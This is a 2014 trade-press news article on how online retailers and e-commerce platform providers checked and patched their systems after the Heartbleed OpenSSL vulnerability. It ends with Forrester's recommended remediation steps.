Retailers scramble to plug Heartbleed
April 11, 2014 06:26 PM
Netflix Inc. wasted no time this week when word of the Heartbleed software bug spread like a hot video gone viral.
"Like many companies, we took immediate action to assess the vulnerability and address it,” a Netflix spokesman says. The quick action, he adds, appeared to have prevented any harm to company data. “We are not aware of any customer impact.” Netflix is No. 9 in the Internet Retailer’s Top 500 Guide.
Netflix, which operates its web site on an e-commerce platform developed in-house, didn’t comment more on the steps it took to guard against Heartbleed. That’s the name of a flaw recently discovered in the OpenSSL encryption technology that many companies use to protect the data on their web sites and Internet-connected computer networks. SSL—or secure sockets layer—is a common encryption technology used in Internet routers and other networking equipment to protect data such as account numbers and payment information.
It also is widely used to protect a wide range of web connections and applications, including e-mail systems and Internet connections to the technology of a company’s outside vendors, such as hosted payroll management software.
The “Open” in OpenSSL, however, refers to an open-source version of SSL that has been compromised by the Heartbleed bug, experts say. Proprietary SSL technology provided by companies like Symantec Inc., Thwarte and others were not impacted, says Steve Krebsbach, vice president of technology at Volusion Inc., a provider of an e-commerce technology platform.
Heartbleed’s biggest impact was on Internet-based data storage and other applications from companies including Google Inc., Amazon.com Inc.’s Amazon Web Services and web-hosting firm Rackspace Inc. With these systems largely built on open-source technology, they tend to include a lot of OpenSSL encryption technology, Krebsbach says.
One online retailer said privately that it worked quickly with Amazon Web Services this week to ensure that its software was patched and passwords changed to prevent any possible intrusions into its web infrastructure.
Google, Amazon and Rackspace each issued updates this week on how they had updated their systems, and were continuing to do so, to prevent security breaches.
Cisco Systems Inc. and Juniper Networks—two major providers of Internet routers and other gear—also said that many of their products were affected by the Heartbleed bug and that they were taking steps to fix it.
Meantime, other online merchants and technology firms said they were taking several precautionary steps to ensure their web sites and other digital applications were protected. Among other things, they checked with e-commerce platform providers, web hosting services, and any other vendors for which they maintain Internet connections.
“We verified with our I.T. provider that all was well with our in-house network,” says Derek Gaskins, president of Aleva Stores, No. 486 in the Internet Retailer’s Top 500 Guide. “None of our equipment was utilizing OpenSSL.” But, taking no chances, he adds that his lead software developer was still “going through everything with a fine-tooth comb to be sure. But we appear to have dodged this bullet.”
Richard Sexton, president of online furniture retailer Carolina Rustica, which operates on the Magento e-commerce platform, says he was able to work Rackspace, his hosting service, to ensure his site wasn’t vulnerable. Carolina Rustica is part of Mattress USA Inc., No. 348 in the Top 500.
At Volusion, Krebsbach says the company’s e-commerce platform was never directly threatened by the Heartbleed bug because Volusion doesn’t use OpenSSL encryption. Nonetheless, he says Volusion quickly contacted some 20 or so companies that supplies it with Internet hardware, such as routers or switches, to ensure they didn’t have OpenSSL technology that wasn’t updated.
Shopify Inc., which provides e-commerce technology hosted on the Internet, also said that its client online stores were secured against the Heartbleed vulnerability. Nonetheless, “we do advise all our merchants to do an audit of all the other companies they use for e-mail hosting, banking, payroll, etc.,” vice president of growth Craig Miller says. “It’s also a very good practice to change passwords on a regular basis.”
Forrester Research Inc., which estimates that at least half of all external-facing web sites use OpenSSL in some fashion, issued a report on Heartbleed Friday—“Quick Take: Stem the ‘Heartbleed: How to fix a broken OpenSSL implementation and what to do while everyone else fixes theirs” —that includes the following steps e-commerce companies should take:
● Upgrade all software applications that use OpenSSL to the newest versions that support deal with the Heartbleed vulnerability according to a fix issued by the OpenSSL Project, the volunteer organization of software engineers behind OpenSSL;
● Contact all of a web property’s hardware as well as software vendors to confirm they’ve upgraded their own systems;
● Schedule a company-wide password change for software systems as quickly as possible;
● Proactively tell employees as well as customers what steps your company is taking to deal with Heartbleed.